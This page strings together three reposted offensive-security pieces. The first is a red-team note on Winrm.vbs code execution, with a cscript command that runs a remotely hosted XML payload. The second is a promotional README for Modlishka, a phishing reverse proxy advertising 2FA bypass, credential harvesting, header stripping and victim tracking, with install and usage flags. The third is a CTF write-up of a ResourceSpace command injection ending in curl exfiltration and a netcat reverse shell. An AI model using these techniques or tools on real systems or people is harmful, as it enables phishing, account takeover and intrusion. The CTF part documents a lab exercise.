Round of use Winrm code execution XML

Original text by Matt harr0ey

Introduction 
This beginning alludes to give point simple concept related to using Winrm.vbs to do code executed by XML file so I could collect a few ideas we totally can use to do a simple method is being offered by the red team like Winrm.vbs is getting more popular so I found some things can’t waste any more time to release them,

Winrm.vbs ==> Windows Remote Management

Synopsis 
Winrm is simple service to manage your code execute or instruction on any systems via your computer using WS-Management protocol but this service isn’t being offered here in this a blog post I just give local execute but this may happen remotely if you connect with any servers or computers 
further information,
https://docs.microsoft.com/en-us/windows/desktop/winrm/about-windows-remote-management

Usage XML/Winrm.vbs 
First of all if you just heard about XML/Winrm.vbs here at this time when you saw this a blog post I would say, Yes this research winrm.vbs is totally different from any XML codes else so you can go to have a look at this Microsoft’s concept It gives good description to understand Winrm’s instruction to use

So what’s the relationship between normal XML and Winrm XML 
I think the different from normal XML code and Winrm.vbs code is simple different between them there is something called normal XML is easy to understand but it doesn’t Winrm’s XML isn’t, but Winrm.vbs XML has different codes and different uses from normal XML so let’s go to have a look at picture contains a bit instruction related to WInrm’s XML code
MS-Windows Remote management

Small notes guys
It’s better for you to take full privileges Open as administrator or if you use any platforms Empire Powershell or MSF you can go to get more high level than normal session but don’t forget to use Get-TokenPrvivs
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-TokenPrivs.ps1

Currently we have graphic inside a picture shows some information is beneficial for you how XML’s code is being implemented via XML instructions, but be careful because normal language XML cannot be used by Winrm.vbs I think we must use only Winrm’s XML language and Its version,

These some instructions take you to how you can execute XML/Winrm.vbs via Cscript.exe although I found something else related to the same execute Winrm.vbs but It doesn’t work on my version windows but may works on Windows server2008 or others versions as well, if you have VM and Windows server2008 you can use this research remotely

This text shows remote execute and next picture shows local execute

cscript.exe winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -remote:https://gist.githubuserconten
t.com/homjxi0e/da3a5f4b5f48d60b156960bf27a4d164/raw/b615f853cf962566a516a320e9324fbfdcb124fc/PoCWinrm.xml

Here you can look forward to seeing another new Winrm a blog post detected ( RedCanary ) 
Reference,
Lateral Movement Using WinRM and WMI
https://www.redcanary.com/blog/lateral-movement-winrm-wmi/

Modlishka — An Open Source Phishing Tool With 2FA Authentication

Original text by Lydecher black


Modlishka — An Open Source Phishing Tool With 2FA Authentication

Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
Enjoy 🙂

Features
Some of the most important ‘Modlishka’ features :

  • Support for majority of 2FA authentication schemes (by design).
  • No website templates (just point Modlishka to the target domain — in most cases, it will be handled automatically).
  • Full control of «cross» origin TLS traffic flow from your victims browsers.
  • Flexible and easily configurable phishing scenarios through configuration options.
  • Pattern based JavaScript payload injection.
  • Striping website from all encryption and security headers (back to 90’s MITM style).
  • User credential harvesting (with context based on URL parameter passed identifiers).
  • Can be extended with your ideas through plugins.
  • Stateless design. Can be scaled up easily for an arbitrary number of users — ex. through a DNS load balancer.
  • Web panel with a summary of collected credentials and user session impersonation (beta).
  • Written in Go.

Action
«A picture is worth a thousand words»:
Modlishka in action against an example 2FA (SMS) enabled authentication scheme:

Note: google.com was chosen here just as a POC.

Installation
Latest source code version can be fetched from here (zip) or here (tar).
Fetch the code with ‘go get’ :


$ go get -u github.com/drk1wi/Modlishka

Compile the binary and you are ready to go:


$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make

# ./dist/proxy -h


Usage of ./dist/proxy:
     
  -cert string
     base64 encoded TLS certificate
 
  -certKey string
     base64 encoded TLS certificate key
 
  -certPool string
     base64 encoded Certification Authority certificate
 
  -config string
     JSON configuration file. Convenient instead of using command line switches.
 
  -credParams string
       Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)

  -debug
     Print debug information
 
  -disableSecurity
     Disable security features like anti-SSRF. Disable at your own risk.
 
  -jsRules string
     Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
 
  -listeningAddress string
     Listening address (default "127.0.0.1")
 
  -listeningPort string
     Listening port (default "443")
 
  -log string
     Local file to which fetched requests will be written (appended)
 
  -phishing string
     Phishing domain to create - Ex.: target.co
 
  -plugins string
     Comma seperated list of enabled plugin names (default "all")
 
  -postOnly
     Log only HTTP POST requests
 
  -rules string
     Comma separated list of 'string' patterns and their replacements.
 
  -target string
     Main target to proxy - Ex.: https://target.com
 
  -targetRes string
     Comma separated list of target subdomains that need to pass through the  proxy
 
  -terminateTriggers string
     Comma separated list of URLs from target's origin which will trigger session termination
 
  -terminateUrl string
     URL to redirect the client after session termination triggers
 
  -tls
     Enable TLS (default false)
 
  -trackingCookie string
     Name of the HTTP cookie used to track the victim (default "id")
 
  -trackingParam string
     Name of the HTTP parameter used to track the victim (default "id")

Usage

  • Check out the wiki page for a more detailed overview of the tool usage.
  • FAQ (Frequently Asked Questions)
  • Blog post

Credits
Thanks for helping with the code go to Giuseppe Trotta (@Giutro)

Insomni’Hack Teaser 2019 — exploit-space

Original text by @Ghostx_0

CTF URL: https://teaser.insomnihack.ch/

Solves: 7 / Points: 500 / Category: Web

Challenge description

We have created a little exploit space and made it accessible for everyone! Have fun! You can get your own exploit space here.

Challenge resolution

This challenge was the most realistic yet fun web challenge of this Insomni’Hack teaser, as it presented nothing less than an installation of the ResourceSpace open source digital asset management software.

The first step, like for any challenge, was the reconnaissance phase.

As indicated in the commented HTML code, the installed version of the ResourceSpace was the version 8.6.12117:

ResourceSpace Version

This software being open source, we can audit its source code in order to find vulnerabilities we can exploit.

We can then look at the Git commits logs to find juicy commit messages like this one:

Commit logs

Looking at the diff view for this commit, reveals the vulnerable entry point in the “/plugins/pdf_split/pages/pdf_split.php” page being passed to the run_command() function:

Gif diff

The fix introduced by this commit just sanitizes the user inputs by applying the escapeshellarg() function:

escapeshellarg function

Using the semi-colon character thus completes the comnand line, allowing us to execute arbitrary commands on the web server. However, as we don’t have a direct visible output, we need to use an HTTP server such as the Burp collaborator listening for incomming requests.

The following POST request uses the curl binary in order to send the result of the whoami command to our web server:

POST request whoami

Immediately after, we see the result of our command in our Burp collaborator interactions panel:

whoami

The final step is to locate and get the flag:

POST request getflag

Wait… What? There’s a captcha that prevents non-interactive access:

captcha

We actually need to obtain an interactive reverse shell on this server.

To do so we can download the netcat binary from our web server using curl, add execution permission and run it:

reverse shell 1

As expected, the web server just connects back to our server, therefore providing us with an interactive reverse shell:

reverse shell 2

And finally we can solve the captcha and get the flag:

flag